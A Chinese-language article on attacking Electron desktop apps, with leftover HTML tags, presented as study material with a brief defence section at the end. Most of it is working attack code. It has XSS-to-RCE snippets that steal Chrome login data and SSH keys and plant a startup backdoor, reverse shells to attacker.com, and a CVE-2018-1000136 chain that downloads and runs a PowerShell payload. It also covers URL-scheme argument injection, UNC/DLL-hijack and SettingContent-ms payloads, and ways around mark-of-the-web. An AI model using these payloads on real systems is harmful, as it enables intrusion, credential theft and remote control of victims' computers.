Electron客户端漏洞学习与研究<\/h1>

一、前言<\/h2>
Electron是一个基于Chromium和Node.js的跨平台桌面应用开发框架，允许开发者使用HTML、CSS和JavaScript等Web技术构建桌面应用。由于其开发便捷性和跨平台特性，被广泛应用于知名应用中，如VSCode、Slack、Discord、Atom等。<\/p>
Electron应用结合了Web技术的灵活性和桌面权限的强大，这为攻击者提供了独特的攻击面。一旦找到突破口，攻击者可以从简单的XSS升级为完全的系统控制。<\/p>

二、Electron架构与攻击面分析<\/h2>

2.1 多进程架构<\/h3>

Electron采用多进程架构，理解这一架构是发现漏洞的基础：<\/p>

主进程（Main Process）<\/strong>：运行在Node.js环境中，拥有完整的系统访问权限，可以执行任意系统命令、访问文件系统<\/li>
渲染进程（Renderer Process）<\/strong>：运行在Chromium环境中，负责页面渲染，权限受限<\/li>

预加载脚本（Preload Script）<\/strong>：在渲染进程加载页面前执行，是连接主进程和渲染进程的桥梁<\/li> <\/ul>
2.2 攻击面识别<\/h3>
从攻击者角度，主要的攻击向量包括：<\/p>

XSS注入点 - 渲染进程中的任何用户可控输入<\/li>
IPC通信通道 - 渲染进程与主进程的消息传递<\/li>
URL Scheme - 自定义协议处理<\/li>
特权API - 预加载脚本暴露的高权限接口<\/li>
远程内容加载 - 应用加载的外部网页<\/li>
文件处理 - 本地文件读取和解析<\/li>
更新机制 - 应用自动更新流程<\/li> <\/ul>
2.3 关键安全配置<\/h3>
从攻击者角度，需要重点关注这些配置项：<\/p>
webPreferences<\/span>:<\/span> { <\/span><\/span> nodeIntegration<\/span>:<\/span> true<\/span>\/<\/span>false<\/span>, \/\/ 关键：能否直接使用Node.js <\/span><\/span><\/span><\/span> contextIsolation<\/span>:<\/span> true<\/span>\/<\/span>false<\/span>, \/\/ 关键：上下文是否隔离 <\/span><\/span><\/span><\/span> webSecurity<\/span>:<\/span> true<\/span>\/<\/span>false<\/span>, \/\/ 是否有同源策略限制 <\/span><\/span><\/span><\/span> sandbox<\/span>:<\/span> true<\/span>\/<\/span>false<\/span>, \/\/ 是否启用沙箱 <\/span><\/span><\/span><\/span> enableRemoteModule<\/span>:<\/span> true<\/span>\/<\/span>false<\/span>, \/\/ 是否可使用remote模块 <\/span><\/span><\/span><\/span> preload<\/span>:<\/span> 'path\/to\/preload.js'<\/span> \/\/ 预加载脚本路径 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>最理想的攻击目标配置<\/strong>：<\/p> nodeIntegration<\/span>:<\/span> true<\/span>, <\/span><\/span>contextIsolation<\/span>:<\/span> false<\/span>, <\/span><\/span>webSecurity<\/span>:<\/span> false<\/span> <\/span><\/span><\/code><\/pre>三、漏洞类型与利用技术<\/h2> 3.1 XSS to RCE（跨站脚本到远程代码执行）<\/h3> 这是Electron应用中最经典的攻击链。<\/p> 3.1.1 攻击条件<\/h4> 完美条件（直接RCE）<\/strong>：<\/p> 存在XSS注入点<\/li> nodeIntegration: true<\/li> contextIsolation: false<\/li> <\/ul> 次优条件（需要绕过）<\/strong>：<\/p> 存在XSS注入点<\/li> nodeIntegration: false 但可以绕过<\/li> 或存在可利用的特权API<\/li> <\/ul> 3.1.2 直接利用<\/h4> 当配置不当时，可以直接执行Node.js代码：<\/p> \/\/ 基础命令执行 <\/span><\/span><\/span><\/span>require<\/span>('child_process'<\/span>).exec<\/span>('calc.exe'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ Windows系统信息收集 <\/span><\/span><\/span><\/span>require<\/span>('child_process'<\/span>).exec<\/span>('systeminfo'<\/span>, (e<\/span>, stdout<\/span>) => { <\/span><\/span> fetch<\/span>('http:\/\/attacker.com\/collect'<\/span>, { <\/span><\/span> method<\/span>:<\/span> 'POST'<\/span>, <\/span><\/span> body<\/span>:<\/span> stdout<\/span> <\/span><\/span> }) <\/span><\/span>}) <\/span><\/span> <\/span><\/span>\/\/ 读取敏感文件 <\/span><\/span><\/span><\/span>const<\/span> fs<\/span> =<\/span> require<\/span>('fs'<\/span>) <\/span><\/span>const<\/span> path<\/span> =<\/span> require<\/span>('path'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 读取Chrome密码 <\/span><\/span><\/span><\/span>const<\/span> chromeData<\/span> =<\/span> fs<\/span>.readFileSync<\/span>( <\/span><\/span> path<\/span>.join<\/span>(process<\/span>.env<\/span>.LOCALAPPDATA<\/span>,'Google\/Chrome\/User Data\/Default\/Login Data'<\/span>)) <\/span><\/span> <\/span><\/span>\/\/ 读取SSH密钥 <\/span><\/span><\/span><\/span>const<\/span> sshKey<\/span> =<\/span> fs<\/span>.readFileSync<\/span>( <\/span><\/span> path<\/span>.join<\/span>(process<\/span>.env<\/span>.USERPROFILE<\/span>, '.ssh\/id_rsa'<\/span>),'utf8'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 植入持久化后门 <\/span><\/span><\/span><\/span>const<\/span> startup<\/span> =<\/span> path<\/span>.join<\/span>( <\/span><\/span> process<\/span>.env<\/span>.APPDATA<\/span>,'Microsoft\/Windows\/Start Menu\/Programs\/Startup\/backdoor.vbs'<\/span>) <\/span><\/span>fs<\/span>.writeFileSync<\/span>(startup<\/span>, maliciousVBS<\/span>) <\/span><\/span><\/code><\/pre>3.1.3 反弹Shell<\/h4> \/\/ Windows反弹Shell <\/span><\/span><\/span><\/span>const<\/span> { exec<\/span> } =<\/span> require<\/span>('child_process'<\/span>) <\/span><\/span>exec<\/span>('powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'attacker.com\',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ Linux\/Mac反弹Shell <\/span><\/span><\/span><\/span>exec<\/span>('bash -i >& \/dev\/tcp\/attacker.com\/4444 0>&1'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 使用Node.js原生实现 <\/span><\/span><\/span><\/span>const<\/span> net<\/span> =<\/span> require<\/span>('net'<\/span>) <\/span><\/span>const<\/span> { spawn<\/span> } =<\/span> require<\/span>('child_process'<\/span>) <\/span><\/span>const<\/span> client<\/span> =<\/span> new<\/span> net<\/span>.Socket<\/span>() <\/span><\/span>client<\/span>.connect<\/span>(4444<\/span>, 'attacker.com'<\/span>, () => { <\/span><\/span> const<\/span> sh<\/span> =<\/span> spawn<\/span>('\/bin\/bash'<\/span>, []) <\/span><\/span> client<\/span>.pipe<\/span>(sh<\/span>.stdin<\/span>) <\/span><\/span> sh<\/span>.stdout<\/span>.pipe<\/span>(client<\/span>) <\/span><\/span> sh<\/span>.stderr<\/span>.pipe<\/span>(client<\/span>) <\/span><\/span>}) <\/span><\/span><\/code><\/pre>3.2 原型链污染攻击<\/h3> 即使不能直接使用require，也可以通过污染原型链来影响模块行为。<\/p> 3.2.1 污染内置对象<\/h4> \/\/ 修改正则表达式行为 <\/span><\/span><\/span><\/span>RegExp.prototype<\/span>.test<\/span> =<\/span> function<\/span>() { <\/span><\/span> return<\/span> false<\/span> \/\/ 让所有正则匹配失败 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 修改数组方法 <\/span><\/span><\/span><\/span>Array.prototype<\/span>.join<\/span> =<\/span> function<\/span>() { <\/span><\/span> return<\/span> "calc.exe"<\/span> \/\/ 返回恶意命令 <\/span><\/span><\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 修改JSON解析 <\/span><\/span><\/span><\/span>const<\/span> originalParse<\/span> =<\/span> JSON<\/span>.parse<\/span> <\/span><\/span>JSON<\/span>.parse<\/span> =<\/span> function<\/span>(str<\/span>) { <\/span><\/span> const<\/span> obj<\/span> =<\/span> originalParse<\/span>(str<\/span>) <\/span><\/span> \/\/ 注入恶意属性 <\/span><\/span><\/span><\/span> obj<\/span>.__proto__<\/span>.isAdmin<\/span> =<\/span> true<\/span> <\/span><\/span> return<\/span> obj<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2.2 利用被污染的原型<\/h4> \/\/ 应用代码中的漏洞利用 <\/span><\/span><\/span><\/span>const<\/span> { exec<\/span> } =<\/span> require<\/span>('child_process'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 应用原本想执行安全命令 <\/span><\/span><\/span><\/span>let<\/span> commands<\/span> =<\/span> ['echo'<\/span>, 'hello'<\/span>, 'world'<\/span>] <\/span><\/span>exec<\/span>(commands<\/span>.join<\/span>(' '<\/span>)) \/\/ 实际执行：calc.exe <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 或者污染Object.prototype <\/span><\/span><\/span><\/span>Object.prototype<\/span>.admin<\/span> =<\/span> true<\/span> <\/span><\/span> <\/span><\/span>\/\/ 应用代码检查权限 <\/span><\/span><\/span><\/span>if<\/span> (userObj<\/span>.admin<\/span>) { <\/span><\/span> \/\/ 执行管理员操作 <\/span><\/span><\/span><\/span> executeAdminCommand<\/span>() <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.3 CVE-2018-1000136：nodeIntegration绕过<\/h3> 这是一个影响所有早期Electron版本的严重漏洞，即使禁用了nodeIntegration，仍可重新开启。<\/p> 3.3.1 漏洞原理<\/h4> 漏洞源于window.open()的特性处理机制：<\/p> window.open()可以通过features参数设置新窗口选项<\/li> 子窗口会继承父窗口的webPreferences<\/li> 但存在验证缺陷，可以传递webviewTag: yes<\/li> 然后在新窗口中创建带有nodeIntegration的webview<\/li> <\/ul> 3.3.2 完整利用链<\/h4> <script<\/span>> <\/span><\/span>\/\/ 第一步：打开新窗口并启用webviewTag <\/span><\/span><\/span><\/span>var<\/span> w<\/span> =<\/span> window.open<\/span>('about:blank'<\/span>, ''<\/span>, 'webviewTag=yes,show=no'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 第二步：在新窗口中注入恶意代码 <\/span><\/span><\/span><\/span>w<\/span>.eval(` <\/span><\/span><\/span> \/\/ 创建webview标签 <\/span><\/span><\/span> var webview = new WebView() <\/span><\/span><\/span> \/\/ 设置危险配置 <\/span><\/span><\/span> webview.setAttribute('webpreferences', <\/span><\/span><\/span> 'webSecurity=no, nodeIntegration=yes') <\/span><\/span><\/span> \/\/ 加载恶意页面(base64编码) <\/span><\/span><\/span> webview.src = 'data:text\/html;base64,' + btoa(\` <\/span><\/span><\/span> <script> <\/span><\/span><\/span> \/\/ 现在拥有Node.js权限 <\/span><\/span><\/span> const { exec } = require('child_process') <\/span><\/span><\/span> \/\/ 信息收集 <\/span><\/span><\/span> exec('whoami', (e, stdout) => { <\/span><\/span><\/span> console.log('Current user:', stdout) <\/span><\/span><\/span> }) <\/span><\/span><\/span> \/\/ 下载并执行Payload <\/span><\/span><\/span> exec('powershell -c "IEX(New-Object Net.WebClient).DownloadString(\\'http:\/\/attacker.com\/payload.ps1\\')"') <\/span><\/span><\/span> \/\/ 或直接执行命令 <\/span><\/span><\/span> exec('calc.exe') <\/span><\/span><\/span> <\\/script> <\/span><\/span><\/span> \`) <\/span><\/span><\/span> \/\/ 添加到DOM <\/span><\/span><\/span> document.body.appendChild(webview) <\/span><\/span><\/span>`<\/span>) <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>3.4 URL Scheme参数注入<\/h3> Electron应用注册的自定义协议是重要的攻击面。<\/p> 3.4.1 发现已注册的Scheme<\/h4> Windows注册表查询<\/strong>：<\/p> :: 列出所有注册的协议<\/span> <\/span><\/span>reg query HKEY_CLASSES_ROOT \/f "URL Protocol"<\/span> \/s <\/span><\/span> <\/span><\/span>:: 查看特定协议<\/span> <\/span><\/span>reg query HKEY_CLASSES_ROOT\myapp <\/span><\/span><\/code><\/pre>脚本<\/strong>：<\/p> ' duh4win.vbs - 自动发现URL Scheme Set objShell = CreateObject("WScript.Shell") Set objRegistry = GetObject("winmgmts:\/\/.\/root\/default:StdRegProv") ' 枚举HKCR objRegistry.EnumKey &H80000000, "", arrKeys For Each key In arrKeys On Error Resume Next value = objShell.RegRead("HKCR\" & key & "\URL Protocol") If Err.Number = 0 Then WScript.Echo key & " - URL Protocol found" End If Err.Clear Next <\/code><\/pre> 3.4.2 参数闭合攻击<\/h4> 注册表配置示例：<\/p> HKEY_CLASSES_ROOT\myapp\shell\open\command (Default) = "C:\Program Files\MyApp\app.exe" "%1" <\/code><\/pre> Payload：<\/p> <\/span> <\/span><\/span><a<\/span> href<\/span>=<\/span>'myapp:\/\/test" --renderer-cmd-prefix="calc.exe'<\/span>>Click me<\/a<\/span>> <\/span><\/span> <\/span><\/span><\/span> <\/span><\/span><a<\/span> href<\/span>=<\/span>'myapp:\/\/x" --renderer-cmd-prefix="powershell -c IEX(New-Object Net.WebClient).DownloadString(\'<\/span>http:<\/span>\/\/<\/span>evil<\/span>.<\/span>com<\/span>\/<\/span>payload<\/span>.<\/span>ps1<\/span>\')'<\/span>> <\/span><\/span> Update Available - Click to Install <\/span><\/span><\/a<\/span>> <\/span><\/span> <\/span><\/span><\/span> <\/span><\/span><a<\/span> href<\/span>=<\/span>'myapp:\/\/x" --gpu-launcher="cmd.exe \/c start calc.exe'<\/span>>Launch<\/a<\/span>> <\/span><\/span><\/code><\/pre>3.4.3 可利用的Chromium参数<\/h4> \/\/ 命令执行相关 <\/span><\/span><\/span><\/span>--<\/span>renderer<\/span>-<\/span>cmd<\/span>-<\/span>prefix<\/span>=<\/span>"<command>"<\/span> <\/span><\/span>--<\/span>gpu<\/span>-<\/span>launcher<\/span>=<\/span>"<command>"<\/span> <\/span><\/span>--<\/span>utility<\/span>-<\/span>cmd<\/span>-<\/span>prefix<\/span>=<\/span>"<command>"<\/span> <\/span><\/span>--<\/span>ppapi<\/span>-<\/span>plugin<\/span>-<\/span>launcher<\/span>=<\/span>"<command>"<\/span> <\/span><\/span> <\/span><\/span>\/\/ 文件读取\/加载 <\/span><\/span><\/span><\/span>--<\/span>ppapi<\/span>-<\/span>flash<\/span>-<\/span>path<\/span>=<\/span>"<path>"<\/span> <\/span><\/span>--<\/span>ppapi<\/span>-<\/span>flash<\/span>-<\/span>args<\/span>=<\/span>"<args>"<\/span> <\/span><\/span> <\/span><\/span>\/\/ 调试相关 <\/span><\/span><\/span><\/span>--<\/span>remote<\/span>-<\/span>debugging<\/span>-<\/span>port<\/span>=<\/span>9222<\/span> <\/span><\/span>--<\/span>inspect<\/span>=<\/span>9229<\/span> <\/span><\/span> <\/span><\/span>\/\/ 禁用安全特性 <\/span><\/span><\/span><\/span>--<\/span>disable<\/span>-<\/span>web<\/span>-<\/span>security<\/span> <\/span><\/span>--<\/span>allow<\/span>-<\/span>file<\/span>-<\/span>access<\/span>-<\/span>from<\/span>-<\/span>files<\/span> <\/span><\/span>--<\/span>disable<\/span>-<\/span>site<\/span>-<\/span>isolation<\/span>-<\/span>trials<\/span> <\/span><\/span><\/code><\/pre>3.5 shell.openExternal深度利用<\/h3> shell.openExternal()提供了多种攻击路径。<\/p> 3.5.1 直接文件执行<\/h4> \/\/ 如果可以控制参数 <\/span><\/span><\/span><\/span>window.electronAPI<\/span>.openUrl<\/span>('file:\/\/\/C:\/Windows\/System32\/cmd.exe'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 更隐蔽的方法 <\/span><\/span><\/span><\/span>window.electronAPI<\/span>.openUrl<\/span>('file:\/\/\/C:\/Windows\/System32\/calc.exe'<\/span>) <\/span><\/span><\/code><\/pre>3.5.2 UNC路径远程加载<\/h4> \/\/ 加载远程SMB共享上的文件 <\/span><\/span><\/span><\/span>shell<\/span>.openExternal<\/span>('file:\/\/attacker.com\/share\/payload.exe'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 加载Java应用(无警告) <\/span><\/span><\/span><\/span>shell<\/span>.openExternal<\/span>('file:\/\/attacker.com\/share\/malicious.jar'<\/span>) <\/span><\/span> <\/span><\/span>\/\/ Python脚本执行(需要环境) <\/span><\/span><\/span><\/span>shell<\/span>.openExternal<\/span>('file:\/\/attacker.com\/share\/backdoor.py'<\/span>) <\/span><\/span><\/code><\/pre>3.5.3 .url文件利用<\/h4> 创建恶意的.url文件：<\/p> ; malicious.url<\/span> <\/span><\/span>[InternetShortcut]<\/span> <\/span><\/span>URL<\/span>=<\/span>file:\/\/\/C:\/Windows\/System32\/cmd.exe<\/span> <\/span><\/span>WorkingDirectory<\/span>=<\/span>C:\<\/span> <\/span><\/span>IconIndex<\/span>=<\/span>0<\/span> <\/span><\/span><\/code><\/pre>触发执行：<\/p> shell<\/span>.openExternal<\/span>('file:\/\/attacker.com\/share\/malicious.url'<\/span>) <\/span><\/span><\/code><\/pre>3.5.4 DLL劫持组合攻击<\/h4> 攻击步骤：<\/p> 寻找存在DLL劫持的系统程序<\/li> <\/ol> # 查找缺少DLL的程序<\/span> <\/span><\/span>Get-ChildItem C:\Windows\WinSxS -Recurse | Where-Object {$_.Name -like<\/span> "*.exe"<\/span>} <\/span><\/span><\/code><\/pre> 创建.url文件<\/li> <\/ol> [InternetShortcut]<\/span> <\/span><\/span>URL<\/span>=<\/span>file:\/\/\/C:\/Windows\/WinSxS\/amd64_netfx-mscorsvw_exe_xxx\/mscorsvw.exe<\/span> <\/span><\/span>WorkingDirectory<\/span>=<\/span>\\attacker.com\share\<\/span> <\/span><\/span><\/code><\/pre> 在SMB共享放置恶意DLL<\/li> <\/ol> \\attacker.com\share\mscorsvc.dll (恶意DLL) <\/code><\/pre> 触发执行<\/li> <\/ol> shell<\/span>.openExternal<\/span>('file:\/\/attacker.com\/share\/trigger.url'<\/span>) <\/span><\/span><\/code><\/pre> 目标程序加载恶意DLL，无任何警告<\/li> <\/ol> 3.5.5 绕过ADS标记<\/h4> ADS（Alternate Data Stream）是Windows的文件信任标记机制。绕过方法：<\/p> \/\/ 方法1：从可信域下载 <\/span><\/span><\/span>\/\/ 将攻击服务器加入受信任站点或本地Intranet <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 方法2：通过PowerShell下载(不产生ADS) <\/span><\/span><\/span><\/span>const<\/span> { exec<\/span> } =<\/span> require<\/span>('child_process'<\/span>) <\/span><\/span>exec<\/span>(`powershell -c "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http:\/\/attacker.com\/payload.exe', 'C:\\Temp\\payload.exe')"`<\/span>) <\/span><\/span> <\/span><\/span>\/\/ 方法3：压缩包方式 <\/span><\/span><\/span>\/\/ 将payload放入zip，用户解压后无ADS标记 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 方法4：手动移除ADS <\/span><\/span><\/span><\/span>exec<\/span>('powershell -c "Unblock-File C:\\Temp\\payload.exe"'<\/span>) <\/span><\/span><\/code><\/pre>3.6 SettingContent-ms利用（CVE-2018-8414）<\/h3> Windows 10特有的攻击向量，已修补但在未打补丁系统上仍可用。<\/p> 3.6.1 创建恶意文件<\/h4> <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><PCSettings><\/span> <\/span><\/span> <SearchableContent<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/Search\/2013\/SettingContent"<\/span>><\/span> <\/span><\/span> <ApplicationInformation><\/span> <\/span><\/span> <AppID><\/span>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel<\/AppID><\/span> <\/span><\/span> <\/span> <\/span><\/span> <DeepLink><\/span>cmd.exe \/c powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http:\/\/attacker.com\/payload.ps1')"<\/DeepLink><\/span> <\/span><\/span> <\/span> <\/span><\/span> <DeepLink><\/span>mshta http:\/\/attacker.com\/payload.hta<\/DeepLink><\/span> <\/span><\/span> <Icon><\/span>%windir%\system32\control.exe<\/Icon><\/span> <\/span><\/span> <\/ApplicationInformation><\/span> <\/span><\/span> <SettingIdentity><\/span> <\/span><\/span> <PageID><\/PageID><\/span> <\/span><\/span> <HostID><\/span>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}<\/HostID><\/span> <\/span><\/span> <\/SettingIdentity><\/span> <\/span><\/span> <SettingInformation><\/span> <\/span><\/span> <Description><\/span>System Settings<\/Description><\/span> <\/span><\/span> <Keywords><\/span>Settings<\/Keywords><\/span> <\/span><\/span> <\/SettingInformation><\/span> <\/span><\/span> <\/SearchableContent><\/span> <\/span><\/span><\/PCSettings><\/span> <\/span><\/span><\/code><\/pre>3.6.2 通过Electron触发<\/h4> shell<\/span>.openExternal<\/span>('file:\/\/attacker.com\/share\/settings.SettingContent-ms'<\/span>) <\/span><\/span><\/code><\/pre>3.6.3 配置文件关联（提升利用）<\/h4> 在已获取权限的系统上：<\/p> :: 修改文件关联<\/span> <\/span><\/span>ASSOC<\/span> .SettingContent-ms=CustomHandler <\/span><\/span>FTYPE<\/span> CustomHandler="C:\Tools\scmwrap.exe"<\/span> "<\/span>%1"<\/span> <\/span><\/span><\/code><\/pre>scmwrap.exe实现：<\/p> \/\/ 解析并执行DeepLink<\/span> <\/span><\/span>XmlDocument doc = new<\/span> XmlDocument(); <\/span><\/span>doc.Load(args[0<\/span>]); <\/span><\/span>XmlNodeList nodes = doc.GetElementsByTagName("DeepLink"<\/span>); <\/span><\/span>foreach<\/span> (XmlNode node in<\/span> nodes) { <\/span><\/span> ShellExecute(0<\/span>, "open"<\/span>, "cmd.exe"<\/span>, "\/C "<\/span> + node.InnerText, ""<\/span>, 0<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.7 特权域XSS利用<\/h3> 特权域中的XSS可以调用特权API，危害极大。<\/p> 3.7.1 识别特权域<\/h4> \/\/ 在渲染进程Console中测试 <\/span><\/span><\/span><\/span>console<\/span>.log<\/span>(location<\/span>.protocol<\/span>) \/\/ file:\/\/ 或特定域名 <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 列出可用的特权API <\/span><\/span><\/span><\/span>Object.keys<\/span>(window).filter<\/span>(k<\/span> => !<\/span>Window<\/span>.prototype<\/span>.hasOwnProperty<\/span>(k<\/span>)) <\/span><\/span> <\/span><\/span>\/\/ 测试Node.js访问 <\/span><\/span><\/span><\/span>typeof<\/span> require<\/span> !==<\/span> 'undefined'<\/span> <\/span><\/span>typeof<\/span> process<\/span> !==<\/span> 'undefined'<\/span> <\/span><\/span><\/code><\/pre>3.7.2 特权API利用<\/h4> 假设预加载脚本暴露了不安全的API：<\/p> \/\/ 不安全的preload.js暴露 <\/span><\/span><\/span><\/span>window.electronAPI<\/span> =<\/span> { <\/span><\/span> downloadFile<\/span>:<\/span> (url<\/span>, path<\/span>) => ipcRenderer<\/span>.invoke<\/span>('download'<\/span>, url<\/span>, path<\/span>), <\/span><\/span> executeFile<\/span>:<\/span> (path<\/span>) => ipcRenderer<\/span>.invoke<\/span>('execute'<\/span>, path<\/span>), <\/span><\/span> readFile<\/span>:<\/span> (path<\/span>) => ipcRenderer<\/span>.invoke<\/span>('read'<\/span>, path<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用Payload：<\/p> <script<\/span>> <\/span><\/span>(async<\/span> () => { <\/span><\/span> \/\/ 下载恶意文件 <\/span><\/span><\/span><\/span> await<\/span> window.electronAPI<\/span>.downloadFile<\/span>( <\/span><\/span> 'http:\/\/attacker.com\/backdoor.exe'<\/span>, <\/span><\/span> 'C:\\ProgramData\\backdoor.exe'<\/span> <\/span><\/span> ) <\/span><\/span> \/\/ 执行 <\/span><\/span><\/span><\/span> await<\/span> window.electronAPI<\/span>.executeFile<\/span>('C:\\ProgramData\\backdoor.exe'<\/span>) <\/span><\/span> \/\/ 读取敏感信息 <\/span><\/span><\/span><\/span> const<\/span> secrets<\/span> =<\/span> await<\/span> window.electronAPI<\/span>.readFile<\/span>( <\/span><\/span> 'C:\\Users\\victim\\Documents\\passwords.txt'<\/span> <\/span><\/span> ) <\/span><\/span> \/\/ 外传数据 <\/span><\/span><\/span><\/span> fetch<\/span>('http:\/\/attacker.com\/steal'<\/span>, { <\/span><\/span> method<\/span>:<\/span> 'POST'<\/span>, <\/span><\/span> body<\/span>:<\/span> secrets<\/span> <\/span><\/span> }) <\/span><\/span>})() <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>3.7.3 链式攻击 - DLL劫持<\/h4> \/\/ 假设只能下载和启动更新程序 <\/span><\/span><\/span><\/span><<\/span>script<\/span>><\/span> <\/span><\/span>(async<\/span> () => { <\/span><\/span> \/\/ 1. 下载恶意DLL到应用目录 <\/span><\/span><\/span><\/span> await<\/span> window.electronAPI<\/span>.downloadFile<\/span>( <\/span><\/span> 'http:\/\/attacker.com\/malicious.dll'<\/span>, <\/span><\/span> 'C:\\Program Files\\TargetApp\\malicious.dll'<\/span> <\/span><\/span> ) <\/span><\/span> \/\/ 2. 下载合法更新程序 <\/span><\/span><\/span><\/span> await<\/span> window.electronAPI<\/span>.downloadFile<\/span>( <\/span><\/span> 'http:\/\/target.com\/update.exe'<\/span>, <\/span><\/span> 'C:\\Temp\\update.exe'<\/span> <\/span><\/span> ) <\/span><\/span> \/\/ 3. 启动更新程序（触发DLL劫持） <\/span><\/span><\/span><\/span> await<\/span> window.electronAPI<\/span>.executeFile<\/span>('C:\\Temp\\update.exe'<\/span>) <\/span><\/span>})() <\/span><\/span><<\/span>\/script><\/span> <\/span><\/span><\/code><\/pre>四、防御建议<\/h2> 4.1 安全配置最佳实践<\/h3> \/\/ 推荐的安全配置 <\/span><\/span><\/span><\/span>webPreferences<\/span>:<\/span> { <\/span><\/span> nodeIntegration<\/span>:<\/span> false<\/span>, <\/span><\/span> contextIsolation<\/span>:<\/span> true<\/span>, <\/span><\/span> webSecurity<\/span>:<\/span> true<\/span>, <\/span><\/span> sandbox<\/span>:<\/span> true<\/span>, <\/span><\/span> enableRemoteModule<\/span>:<\/span> false<\/span>, <\/span><\/span> preload<\/span>:<\/span> path<\/span>.join<\/span>(__dirname<\/span>, 'preload.js'<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>4.2 输入验证和输出编码<\/h3> 对所有用户输入进行严格验证，对输出内容进行适当编码。<\/p> 4.3 最小权限原则<\/h3> 预加载脚本只暴露必要的API，遵循最小权限原则。<\/p> 4.4 定期安全更新<\/h3> 保持Electron框架和相关依赖的最新版本。<\/p> 五、总结<\/h2> Electron客户端安全是一个复杂而重要的领域。攻击者可以通过多种技术路径实现从简单的XSS到完整的系统控制。理解这些攻击技术不仅有助于攻击者进行渗透测试，也能帮助开发者构建更安全的应用程序。<\/p> 防御Electron应用的安全威胁需要从架构设计、配置管理、代码实现等多个层面进行综合考虑，实施纵深防御策略。<\/p>